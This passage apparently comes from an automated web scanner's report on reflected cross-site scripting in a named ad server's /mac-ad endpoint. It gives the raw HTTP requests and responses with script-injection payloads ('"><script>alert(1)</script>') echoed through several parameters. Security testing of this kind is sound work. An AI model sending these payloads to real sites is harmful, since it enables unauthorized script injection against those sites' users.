1AxsYBzoLba+u6l87gczye8xuTrYhFfwlnHydy7IYalgPJBk32vZgWW2CXqypZtqnwMKkA2NoSDvvRLOZsd5s2E5nriVmz0A020hMNet6ezR0BbsbFJkikbhD25+D5hxe38KqYGvD586gb8nEzI0j5isfTJ/lkLrhbQFBZeshLI9NVhvhrxY3ujvMVlKz2TG/zsc7BVzk9fFPtT7mgROfudWRI+VvwrnXNE2vCSQzOJZeEAKPJctLVBCeeH5f0I+bMVOeVLPDBFeBnbAN+UOthqW+XB3wOga/8nLvsjoupDcwH+hneOk/D89Naxn/NKF3MEN04OWc1SJ6wrzqU6VhG4EvS+Zv+fJ8Gt98W7PtFLVLD0oQ=="; rsi_us_1000000="pUMV4ylDPxYY7RUCt3RYS68XU2Z/uOqvJR0SNgYO9rFAJiyyAu+FxS1Z30ODwyEFcoEx3T1Eetffz3Mf20XkwCrwYFLZZJxtyzGTJat2XTjlIN8P+hQPSL5K9zsL+kusRTvgKYlhihBhqZKK6GKen73oVAV9BWGkbl//D/fTGMFsID28cq6D7duOtAY3S7ThixmzbEOMxOHaa0VO3cDkKGVKS9qitOaUYlvgkLY1MKDOtODLrFUkILMlSRpCe7+47YCa4Yvgfmntw+kxPheKq6wDe8Fd8gOqjo+YsYcbcBetJ/UlUtydzNb+VQfdT8dEj/2h41IZ5vmY/5vsAZW1gUJs43Y9iklV1tAb9jY/G3Rk4zy39xByfOtBbqnZZm8zU97WhpjXwdwTrCSEuJ4CNdY/fhO3f+aPVPTKG9RnYRL0QJ4kFGhThODFPtf76e2qY1SQ9slSHrnY01CTJTrHMxySjJKQAVAr1obI8ilzYsPlaT1OSvYVS9TK9PoGrO5Jx5bXw/zwwE6Wrxwt7KjBiQjMb8pc2/6daLQ71r2XwEeaREz3clc3XYbmXIZKYmXXjpSqe6jB0kwcSkFst/ViDZpkDsFltV4ci5YQ/eJMqmyKrF/0uup6pq93xJKQibeBPvkCxBjBIGLPE6+meOzdSPUPxAyoXPah9kyi7C70w/Ic06E82HDgxMfptenJH+QxMcJPPGsyFAVT+6SBuOjuKJ5KYDNUBXyxL2dg7B2oqDAiqh1W+megWtR3XoJXxE+b3k70BKlvT5YvEuZ0/RALqrZKe/52guDCx1yv8IEqB3NuIb5M9E0P1eLplz4HhYGMt1XJa6PPDxd4ljqvSFEQClJtagh9UzDEFg6Cb5LdDadrKiwtHRl62r3F/lJB8Wq3syJAxzEPLO4bM0VnXvq5faJnoE+6gBD5yjyVDaOWRfQzLGIWkNHa+f2KJvAyTQlC4oHYQZOGM/cVc3WrnRQmj1KDwCk/46Dq6gu9fFpETdaKz7DpE5AVcVASeUiRu6t0E9gdbxRFlQnHfQxlj0O0yv/8sVDJfLtBv7VEv6KvS85d/vyrS+3/lJtowlLX877yZqlnDrYhsgIzJ/B2kGU/Y2tWcJtJNzrSLvL6uC6zAE3YCN+2b8ZfetlvToWWUxLm+kOAX5sNQa84+z+Y7BiXKA28ArWYuR2BzhZYqV+lNsl8IuYWHrQEhBevE6yTgfXBfZ5ZWDuef3muciM4uxq9eRevsktzwd4ZolhUro4q9RDXzP+z/Jt3SlkekF3F1UyZn5rEt9sK3VhPrPz7bFs0pGO/fShWwUhEJGkkGofDmr7oO9xVS0wlWlGR+HiZLLiNXtFztdl/InifBdzZrv7tEgPT/Ekl1qqx4lzM76Hls1fjGRalSthbIGWedXoj3t9T64fqUJnYWdom7ygUV4OI6Uek4g2aJV2sE2HBrV7ibQMfkHW6H2qlf/AvGzXk5juIW8AOsU6N3bJugxzerwleYqkN4SEXHO2TsUUB2Hii30ULmVN5KVwl4AT7t07WbQfIgUgh+J4zgAJSZ1//mvY7cAo2t7r+WZ+3UqK9EVFlB88NDlOgh4Jm3SdKvwyEx2VIxC8FQZezWpUIHfmHUohseSJ3s3QYI0FyZt+UimHMdHcAt0unq75eibm7XCXgvJjZ8QEa2uTso9gthoSRwjtm4zJD8KuDs9Dol9dL10gwkePtd9XjMMl1IiMfHEGPMzYrTXatfWNnptioKHatYztwbz3JzwC1e1SaBMwSq2wE51biaKnVTIX7gjw1dfMUEcH+SSwe4EKfaZDW3Y8jNtoFzFv7v+gK3Q=="; NETSEGS_E05510=bff01c00ddc153c5&E05510&0&4df0b096&0&&4dc9f625&271d956a153787d6fee9112e9c6a9326; udm_0=MLv39CEJZjpv597JwHIRxS7gdG4nwPAq6ZuDH+vX93uE8x+80+EqavgLMjsVMcRzx4ED/5sU/DdHAgOy6ZFF6u9krYB07BFG6K2gCx9zATNAOyKPGfTqVHvkpDwSF+KJXhEbXYpBgIjd3IWX3TqLfPz6jE8vTUf3pdaWUiZB3YUWt0CiIC5F0X3tPgb/SivyvtveJcRXnIKv7kXwRgYvCvr55V+AZTEVXPZ4e3YCovCIOgMpRBSkPQefrNyf8+fevxeSnnxLtLBTd7bn/zQn98TJd0YWeOHbFIVzmnJlL/meZ5F8yEzm7HiS+gYXKCqjfBEgEJXe7pa4nhHi/FyghIrWjtv72jtBRuTmEa1PtCcp9wfqOSXME/TC3DDlgc0Ij565ULgb+NLzIZ6TpI8vIyqOkYR2CJSFdZdVnBUG0ncgAuL4be/4qG/lpeLJAr4R2ZcdSh9ENtyBu0UsstxyoNHHwBT0SxG1olEQxWdxat7mSTK4NzNH7bvJyyZeNxeZoviFwczbub9BMnSayVKnrf8mLmZYn0G+URiIr9to1aqeDG6xKYVAmQwGVEGKynGOyuqpwObt+MyvmywUWEZ1qy3YzLOSZi95dlvgQqf5nm2jI0E/rWzPceCg9nrDXdY5aA2KiG6/Ag/Qtn9BE0P6tHnl8GXHStyZrY4yXNhIUbljw44dlYagYpCHt4M3J4bPZG8YwZUp0ecARePUDtezFyfvRsc1iatb1pDP+cq/6Iul6LmWpIrzCvxlo9THyXVf5SG33tg9Lw2R/Ro5VrxlHAMqi5EG0xBZZuKHWEnXQrAXGw8FaURhjx71p9CkHtHT1BpsJC15G4HDCuuHnAqa2MRPkYaEZL2cVa7b84SiSmL76sma6ZAVTmsWibG6oMtgf+rO6uurjCoZJ5OCsW83NGfMcjZCzPl33xUGXappEWzObGyaUvOz7ose722NuQ6CgmfMlORcS+CfKwXULjWH6Zy36QCvGrnsM/T/4K0FLlEQnA/ZrpS8O/uyK8UlrSZbknpF5SKlqTmNy5yEGuQ4SS+qP+oPyRgWbGkd6TLhbS8wVZYRN53ZAc0jxNNVRDNVFRE9QSI2VrlZ/Ka1RizjzXzy0Mrq6kcHNlCK91uDwhC94dfZh3mu4LEbkhOgwvScvmwGeZy8gGWoQEjk0gAgb9SgQmtGBl5C+T7TrdHq6EejqJkS0OH/st2RxRBZGNqPJSPFO3Z9nkwH7dr0G89yU1lVThr9TPeyrKuuQlOnafjtcNVr+buGb3emJOGcjzfH90v2UdAQiKm9gZ6BDbLaq/nbVWxP/5HqWbZLa2/RS2GM94ibxZPKXwTQTSnoK6758zl7N8nLPQGrb7mauaNrJ0v4zNciOQWnVNzZaqhQO8UVgcjuWrUQiJTPQWDKxu4w8eoM53ZEdNIh7WnKbwDRVqkqD0y1KsGwOeg2fZkSaLcNFed69lS3DYgh37CBN1ozAybkSybs/DUjRL93JTQZlPIkdLkbJkhmGdhN2G2Xb4uomwrwx4xxkHDHG3BOj3sObWJNvojJs1Id/pPS2nPanvOm; rsi_segs_1000000=pUPF4kmhOHMQJvAtY6gq+mkAZPosg7ZjSjmgIGbYEtpU+w6+9L4ioURjDVUZb5s2bJaZJyc3lSTsOodoc+LzjgnPXWfftsdz6As2U+S4m3sZ93GnJHkwYOujESwdtKPV2XiklIXPPxY08/+jghS00wcrqZXadzeLZbfrn9ShlwBQ2xmbpA283BtMERrEkp0Jl7AlGaEi8uw/pmdbkTDTCxPk3RxS+r7mTK51H+dLGRbW1fSty/wzVcn4GiBJEhk/0uP0JFLwQAUiAigtm0ZNVycI9AGE/kbo+Gm2GaMwx2IDZVAxGSGKhVfyxDow7LMEpP+/5AxB2aqXpAeWvKTgzd0wbPD0VLITZHo4oKcp6znXDZ/0QtZDxMyG+eh98ur0yF4RcpWqIFje74P6+IbKGLCNtlrtWjwe4OKLvE7KtEgbkcPkFFEShWCdZOSVCnDDkQcZ7HqnUdiwoMeOl35blI92a8QslLUelxYP8/7ksRF/dL4tgXNSVaB+tc0Q5yCGeoBCNTt3rHulcarLm9u5vCWFGW2APunE21aEXgSBAE52Pz5NcqBzMbUN/aEDea9hT+n/3Y/e5hgqyzCkCuGvIG755LivtanLgcg2kcQ5uwmgC0vJQMjRNKX40aTX4VArAzArEgBdkaBkXfsvkFD+Nbxz+zvek4KSXCepFAowCLMZjznkiJClqCAqKRQUoG7+ayD2Ys4bs0RrCwTlot+9B1Fervh4516lHDTrQVdcQIQ5uu++FItEtxejK+cd66ciMtQpvPlEfyhWIHOWGVBeyuJu+FtYTiNAvtNO6ZKSdLQTUzHI1ezwsB4RXs2oHFesxvqomNGH01i4; rtc_IJp3=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Thu, 12 May 2011 13:28:29 GMT
Cache-Control: max-age=86400, private
Expires: Fri, 13 May 2011 13:28:29 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Thu, 12 May 2011 13:28:29 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "K05540AD57A<SCRIPT>ALERT(1)</SCRIPT>DB723B0C3CF" was not recognized.
*/
2.102. http://mads.com.com/mac-ad [&&&&&&adfile parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.com.com
Path:   /mac-ad

Issue detail

The value of the &&&&&&adfile request parameter is copied into the HTML document as plain text between tags. The payload 90a7b<a>03a92f842f2 was submitted in the &&&&&&adfile parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?&_RGROUP=13038&&CNET-BRAND-ID=2&HUB=cn&PTNR=2&LOCALE=en_US&CNET-SITE-ID=2&ASSET_HOST=adimg.com.com&&&&&&&ENG:DATETIME=2011.05.12.09.28.27&SYS:RQID=01phx1-ad-e19:4DCB7A2656E16D&&REFER_HOST=tag.admeld.com&&&&&&&adfile=7074/11/445195_wc.ca90a7b<a>03a92f842f2 HTTP/1.1
Host: mads.com.com
Proxy-Connection: keep-alive
Referer: http://mads.com.com/mac-ad?CELT=ifc&BRAND=2&SITE=2&ADSTYLE=NOOVERGIF&_RGROUP=13038
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XCLGFbrowser=Cg8JIk24ijttAAAASDs

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:41 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Thu, 12 May 2011 13:33:41 GMT
Content-Length: 594

<!-- MAC ad --><!-- NO AD TEXT: _QUERY_STRING="&_RGROUP=13038&&CNET-BRAND-ID=2&HUB=cn&PTNR=2&LOCALE=en_US&CNET-SITE-ID=2&ASSET_HOST=adimg.com.com&&&&&&&ENG:DATETIME=2011.05.12.09.28.27&SYS:RQID=01phx1-ad-e19:4DCB7A2656E16D&&REFER_HOST=tag.admeld.com&&&&&&&adfile=7074/11/445195_wc.ca90a7b<a>03a92f842f2" _REQ_NUM="0" -->
...[SNIP]...
2.103. http://mads.com.com/mac-ad [BRAND parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.com.com
Path:   /mac-ad

Issue detail

The value of the BRAND request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7654a"><script>alert(1)</script>e0762987b06 was submitted in the BRAND parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?CELT=ifc&BRAND=27654a"><script>alert(1)</script>e0762987b06&SITE=2&ADSTYLE=NOOVERGIF&_RGROUP=13038 HTTP/1.1
Host: mads.com.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/businesstech/300x250/businesstech_btf?t=1305206897249&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XCLGFbrowser=Cg8JIk24ijttAAAASDs

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:29:22 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 12 May 2011 13:29:22 GMT
Content-Length: 2486

<!-- MAC ad -->
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>CNET ad iframe content</title>
<style
...[SNIP]...
<a href="http://adlog.com.com/adlog/c/r=13038&amp;sg=445195&amp;o=&amp;h=cn&amp;p=2&amp;b=27654a"><script>alert(1)</script>e0762987b06&amp;l=en_US&amp;site=2&amp;pt=&amp;nd=&amp;pid=&amp;cid=&amp;pp=&amp;e=&amp;rqid=01phx1-ad-e16:4DCB4EC77D9544&amp;orh=admeld.com&amp;oepartner=&amp;epartner=&amp;ppartner=&amp;pdom=tag.admeld.com&amp;
...[SNIP]...
2.104. http://mads.com.com/mac-ad [BRAND parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.com.com
Path:   /mac-ad

Issue detail

The value of the BRAND request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d12c"><script>alert(1)</script>c5876294348 was submitted in the BRAND parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?CELT=ifc&BRAND=1d12c"><script>alert(1)</script>c5876294348&SITE=2&ADSTYLE=NOOVERGIF&_RGROUP=13038 HTTP/1.1
Host: mads.com.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/businesstech/300x250/businesstech_btf?t=1305206897249&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XCLGFbrowser=Cg8JIk24ijttAAAASDs

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:29:26 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 12 May 2011 13:29:26 GMT
Content-Length: 2483

<!-- MAC ad -->
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>CNET ad iframe content</title>
<style
...[SNIP]...
<iframe src="http://mads.com.com/mac-ad?&amp;_RGROUP=13038&amp;&amp;CNET-BRAND-ID=1d12c"><script>alert(1)</script>c5876294348&amp;HUB=cn&amp;PTNR=2&amp;LOCALE=en_US&amp;CNET-SITE-ID=2&amp;ASSET_HOST=adimg.com.com&amp;&amp;&amp;&amp;&amp;&amp;&amp;ENG:DATETIME=2011.05.12.09.29.26&amp;SYS:RQID=01phx1-ad-e20:4DCB7FE15237E7&amp;
...[SNIP]...
2.105. http://mads.com.com/mac-ad [CELT parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.com.com
Path:   /mac-ad

Issue detail

The value of the CELT request parameter is copied into the HTML document as plain text between tags. The payload a300e<a>fc79e3bca16 was submitted in the CELT parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?CELT=ifca300e<a>fc79e3bca16&BRAND=2&SITE=2&ADSTYLE=NOOVERGIF&_RGROUP=13038 HTTP/1.1
Host: mads.com.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/businesstech/300x250/businesstech_btf?t=1305206897249&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XCLGFbrowser=Cg8JIk24ijttAAAASDs

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:28:52 GMT
Server: Apache/2.2
Content-Length: 388
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: text/plain
Expires: Thu, 12 May 2011 13:28:52 GMT

<!-- MAC ad --><!-- NO AD TEXT: _QUERY_STRING="CELT=ifca300e<a>fc79e3bca16&BRAND=2&SITE=2&ADSTYLE=NOOVERGIF&_RGROUP=13038" _REQ_NUM="0" --><!-- MAC-AD STATUS: ; MAPPING UNEXPECTED CELT &quot;ifca300e
...[SNIP]...
2.106. http://mads.com.com/mac-ad [SITE parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.com.com
Path:   /mac-ad

Issue detail

The value of the SITE request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd19e"><script>alert(1)</script>db9b41f1aae was submitted in the SITE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?CELT=ifc&BRAND=2&SITE=2fd19e"><script>alert(1)</script>db9b41f1aae&ADSTYLE=NOOVERGIF&_RGROUP=13038 HTTP/1.1
Host: mads.com.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/businesstech/300x250/businesstech_btf?t=1305206897249&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XCLGFbrowser=Cg8JIk24ijttAAAASDs

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:29:34 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 12 May 2011 13:29:34 GMT
Content-Length: 2065

<!-- MAC ad -->
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>CNET ad iframe content</title>
<style
...[SNIP]...
<img src="http://adlog.com.com/adlog/i/r=13038&amp;sg=513958&amp;o=&amp;h=cn&amp;p=2&amp;b=2&amp;l=en_US&amp;site=2fd19e"><script>alert(1)</script>db9b41f1aae&amp;pt=&amp;nd=&amp;pid=&amp;cid=&amp;pp=&amp;e=&amp;rqid=00phx1-ad-e16:4DCBD1AEFF9C8&amp;orh=admeld.com&amp;ort=&amp;oepartner=&amp;epartner=&amp;ppartner=&amp;pdom=tag.admeld.com&amp;cpnmodule=&amp;
...[SNIP]...
2.107. http://mads.com.com/mac-ad [SITE parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.com.com
Path:   /mac-ad

Issue detail

The value of the SITE request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19a61"><script>alert(1)</script>325ea0f4ed7 was submitted in the SITE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?CELT=ifc&BRAND=2&SITE=19a61"><script>alert(1)</script>325ea0f4ed7&ADSTYLE=NOOVERGIF&_RGROUP=13038 HTTP/1.1
Host: mads.com.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/businesstech/300x250/businesstech_btf?t=1305206897249&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XCLGFbrowser=Cg8JIk24ijttAAAASDs

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:29:45 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 12 May 2011 13:29:45 GMT
Content-Length: 2488

<!-- MAC ad -->
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>CNET ad iframe content</title>
<style
...[SNIP]...
<iframe src="http://mads.com.com/mac-ad?&amp;_RGROUP=13038&amp;&amp;CNET-BRAND-ID=2&amp;HUB=cn&amp;PTNR=2&amp;LOCALE=en_US&amp;CNET-SITE-ID=19a61"><script>alert(1)</script>325ea0f4ed7&amp;ASSET_HOST=adimg.com.com&amp;&amp;&amp;&amp;&amp;&amp;&amp;ENG:DATETIME=2011.05.12.09.29.45&amp;SYS:RQID=00phx1-ad-e15:4DCB4CB280090E&amp;&amp;REFER_HOST=tag.admeld.com&amp;&amp;&amp;&amp;&amp;&am
...[SNIP]...
2.108. http://mads.com.com/mac-ad [_RGROUP parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.com.com
Path:   /mac-ad

Issue detail

The value of the _RGROUP request parameter is copied into an HTML comment. The payload 1cf86--><a>0abcf34b1c3 was submitted in the _RGROUP parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /mac-ad?CELT=ifc&BRAND=2&SITE=2&ADSTYLE=NOOVERGIF&_RGROUP=130381cf86--><a>0abcf34b1c3 HTTP/1.1
Host: mads.com.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/businesstech/300x250/businesstech_btf?t=1305206897249&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
